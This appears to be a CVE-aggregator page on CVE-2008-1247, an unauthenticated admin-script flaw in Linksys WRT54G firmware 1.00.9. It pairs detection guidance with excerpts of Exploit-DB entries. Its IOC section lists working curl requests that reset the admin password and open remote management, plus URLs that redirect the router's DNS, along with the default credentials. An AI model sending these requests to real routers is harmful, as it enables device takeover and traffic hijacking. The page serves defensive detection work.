CVE-2008-1247
published 2008-03-10CVE-2008-1247: The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to…
PriorityP356critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
5.16%
91.4th percentile
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials when invoking scripts, which allows remote attackers to perform arbitrary administrative actions via a direct request to (1) Advanced.tri, (2) AdvRoute.tri, (3) Basic.tri, (4) ctlog.tri, (5) ddns.tri, (6) dmz.tri, (7) factdefa.tri, (8) filter.tri, (9) fw.tri, (10) manage.tri, (11) ping.tri, (12) PortRange.tri, (13) ptrigger.tri, (14) qos.tri, (15) rstatus.tri, (16) tracert.tri, (17) vpn.tri, (18) WanMac.tri, (19) WBasic.tri, or (20) WFilter.tri. NOTE: the Security.tri vector is already covered by CVE-2006-5202.
Detection & IOCsextracted from sources · hover to see the quote
commandcurl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=0&upnp_enable=1&layout=en" http://192.168.1.1/manage.tri↗
commandcurl -d "remote_mgt_https=0&http_enable=1&https_enable=0&PasswdModify=1&http_passwd=asdf&http_passwdConfirm=asdf&_http_enable=1&web_wl_filter=1&remote_management=1&http_wanport=31337&upnp_enable=1&layout=en" http://192.168.1.1/manage.tri↗
urlhttp://192.168.1.1/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip=192.168.1.1&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0=1&dns0_1=2&dns0_2=3&dns0_3=4&dns1_0=5&dns1_1=6&dns1_2=7&dns1_3=8&dns2_0=9&dns2_1=8&dns2_2=7&dns2_3=6&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en↗
urlhttp://192.168.1.1/WBasic.tri?submit_type=&channelno=11&OldWirelessMode=3&Mode=3&SSID=kinqpinz&channel=6&Freq=6&wl_closed=1&sesMode=1&layout=en↗
- →Detect unauthenticated POST requests to any .tri script on the Linksys WRT54G web interface (port 80); absence of a valid Authorization header combined with a POST to paths matching /*.tri is a strong exploitation indicator. ↗
- →Monitor HTTP traffic for POST requests containing 'FactoryDefaults=Yes' targeting /factdefa.tri, indicating an attempt to reset the router to factory defaults. ↗
- →Alert on POST requests to /manage.tri containing 'PasswdModify=1' and 'remote_management=1', indicating an attempt to change the admin password and enable remote management. ↗
- →Detect POST requests to /Basic.tri containing dns0_0/dns1_0/dns2_0 parameters with non-zero values, indicating DNS poisoning attempts against the router. ↗
- →The exploit can be delivered as a drive-by via a malicious web page using hidden HTML forms and JavaScript (document.f.submit()), causing a victim's browser to POST to 192.168.1.1. Monitor for cross-origin POST requests to 192.168.1.1 from browser traffic. ↗
- →The default Authorization header value 'Basic OmFkbWlu' (base64 for ':admin') may appear in exploit traffic; alert on this specific header value in HTTP requests to router management interfaces. ↗
- ·The vulnerability only affects Linksys WRT54G routers running firmware version 1.00.9 specifically. ↗
- ·The attack relies on the router retaining its default LAN IP address of 192.168.1.1; changing this address breaks the drive-by cross-site attack vector. ↗
- ·All exploit POST requests require the exact full set of parameters; missing any single parameter causes the exploit to fail and no configuration change occurs. ↗
- ·GET requests to the .tri scripts do nothing; only POST requests trigger configuration changes, so detection must focus on POST method. ↗
- ·The Security.tri script is excluded from CVE-2008-1247 as it is already covered under CVE-2006-5202. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
exploitdb·2008-06-24·CVSS 5.0
CVE-2006-5202 [MEDIUM] Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)
---
__ _ ____ ____ ___ ____ ____ ____ _____ ____ ____ _____ ___
| l/ ]l j| \ / \ | \l j| \ | T l j| \ | | / \
| ' / | T | _ YY Y| o )| T | _ Yl__/ | | T | _ Y| __jY Y
| \ | | | | || Q || _/ | | | | || __j | | | | || l_ | O |
| Y | | | | || || | | | | | || / | __ | | | | || _] | |
| . | j l | | |l || | j l | | || || T j l | | || T l !
l__j\_j|____jl__j__j \__,_jl__j |____jl__j__jl_____jl__j|____jl__j__jl__j \___/
<><> Hacking the Linksys WRT54G #2
<><> https://kinqpinz.info/
<><> by meathive
<><> root at kinqpinz.info && kinqpinz.info at gmail.com
++| CVE-2008-1247
The web interface on the Linksys WRT54g router with firmware 1.00.9 does not require credentials
when invoking scripts, which allows remote attackers to perform arbitrary
Exploit-DB
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
exploitdb·2008-03-26·CVSS 10.0
CVE-2008-1247 [CRITICAL] Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
---
regurgitated by: meathive
url: kinqpinz.info ;]
Tue, 05 Feb 2008 07:51:41 -0700
############################################################################
CVE-2008-1247
WRT54G firmware version: v1.00.9
Default LAN IP: 192.168.1.1
Default auth: user:blank - pass:admin
Authorization: Basic OmFkbWlu
php > print base64_decode("OmFkbWlu");
:admin
https://kinqpinz.info/lib/wrt54g/
Refer to the above URL for demonstrations!
The official CVE -- http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-1247 -- entry for these vulnerabilities confirm that although the complexity of these attacks is low, their impact is extremely high.
############################################################################
/******************************
* No Aut
No writeups or analysis indexed.
http://kinqpinz.info/lib/wrt54g/own.txthttp://secunia.com/advisories/29344http://www.gnucitizen.org/projects/router-hacking-challenge/http://www.securityfocus.com/archive/1/489009/100/0/threadedhttp://www.securityfocus.com/bid/28381https://exchange.xforce.ibmcloud.com/vulnerabilities/41118https://kinqpinz.info/lib/wrt54g/https://kinqpinz.info/lib/wrt54g/own2.txthttps://www.exploit-db.com/exploits/5313https://www.exploit-db.com/exploits/5926http://kinqpinz.info/lib/wrt54g/own.txthttp://secunia.com/advisories/29344http://www.gnucitizen.org/projects/router-hacking-challenge/http://www.securityfocus.com/archive/1/489009/100/0/threadedhttp://www.securityfocus.com/bid/28381https://exchange.xforce.ibmcloud.com/vulnerabilities/41118https://kinqpinz.info/lib/wrt54g/https://kinqpinz.info/lib/wrt54g/own2.txthttps://www.exploit-db.com/exploits/5313https://www.exploit-db.com/exploits/5926
2008-03-10
Published